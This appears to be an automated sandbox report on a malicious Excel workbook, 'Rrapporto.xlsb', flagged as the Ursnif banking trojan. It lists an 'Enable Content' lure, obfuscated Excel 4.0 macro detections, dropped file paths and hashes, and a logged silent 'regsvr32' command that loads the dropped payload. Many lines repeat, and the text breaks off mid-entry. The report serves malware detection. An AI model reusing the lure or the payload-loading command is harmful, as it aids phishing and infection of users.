            Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
            Source: Screenshot number: 4Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
            Found Excel 4.0 Macro with suspicious formulasShow sources
            Source: Rrapporto.xlsbInitial sample: EXEC
            Source: Rrapporto.xlsbInitial sample: EXEC
            Found abnormal large hidden Excel 4.0 Macro sheetShow sources
            Source: Rrapporto.xlsbInitial sample: Sheet size: 583568
            Source: Rrapporto.xlsbInitial sample: Sheet size: 583568
            Found obfuscated Excel 4.0 MacroShow sources
            Source: Rrapporto.xlsbInitial sample: High usage of CHAR() function: 97
            Source: Rrapporto.xlsbInitial sample: High usage of CHAR() function: 97
            Office process drops PE fileShow sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dori.ocx 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dori.ocx 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.expl.evad.winXLSB@21/85@7/2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Rrapporto.xlsbJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Rrapporto.xlsbJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.datJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.datJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocx
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocxJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocx
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocxJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Rrapporto.xlsbInitial sample: OLE zip file path = xl/media/image1.png
            Source: Rrapporto.xlsbInitial sample: OLE zip file path = xl/media/image2.png
            Source: Rrapporto.xlsbInitial sample: OLE zip file path = xl/media/image1.png
            Source: Rrapporto.xlsbInitial sample: OLE zip file path = xl/media/image2.png
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocxJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gifJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669